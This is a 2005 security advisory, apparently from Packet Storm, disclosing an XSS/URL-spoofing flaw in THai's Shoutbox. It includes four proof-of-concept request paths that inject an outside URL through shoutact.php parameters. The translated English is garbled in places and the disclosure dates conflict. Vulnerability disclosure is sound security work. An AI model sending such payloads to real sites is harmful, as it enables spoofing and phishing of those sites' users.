thaiXSS.txt

2005-03-29T00:00:00
ID PACKETSTORM:36835
Type packetstorm
Reporter CorryL
Modified 2005-03-29T00:00:00

Description

                                        
                                            `-=[--------------------ADVISORY-------------------]=-  
-=[   
]=-  
-=[ THai's Shoutbox ]=-  
-=[   
]=-  
-=[ Author: CorryL www.x0n3-h4ck.org ]=-  
-=[   
]=-  
-=[----------------------------------------------------]=-  
  
  
-=[+] Application: THai's Shoutbox  
-=[+] Version: not available  
-=[+] Vendor's URL: not available  
-=[+] Platform: Windows\Linux\Unix  
-=[+] Bug type: XSS spoofing url  
-=[+] Exploitation: Remote/Local  
-=[-]  
-=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~  
-=[+] Reference: www.x0n3-h4ck.org ~ irc.xoned.net #x0n3-h4ck  
  
  
..::[ Descriprion ]::..  
  
THai's Shoutbox and' a small glass showcase where the consumers of his/her  
own site can leave messages,  
and' very easy to use and to install, it doesn't need database mysql  
  
  
..::[ Bug ]::..  
  
this application and' he/she cuts from a bug type XSS a remote attaccker it  
is able' to exploit this bug for spoofing a malignant url  
  
..::[ Proof Of Concept ]::..  
  
/shoutact.php?yousay=default&query=http://www.x0n3-h4ck.org  
/shoutact.php?yousay=default&name=default&query=http://www.x0n3-h4ck.org  
/shoutact.php?yousay=default&email=default&query=http://www.x0n3-h4ck.org  
/shoutact.php?yousay=default&email=default&name=default&query=http://www.x0n  
3-h4ck.org  
  
  
..::[ Workaround ]::..  
  
Vendor not avaliable  
  
  
  
..::[ Disclousure Timeline ]::..  
  
[27/03/2005] - No patch relase from vendor (not avaliable)  
[27/02/2005] - Public disclousure  
  
CorryL  
corryl80@gmail.com  
www.x0n3-h4ck.org  
Italian Security Team  
Fax (+39) 02700520894  
Tel (+39) 06452215277  
irc.xoned.net #x0n3-h4ck  
  
_________________________________  
www.seekstat.it is your web stat  
`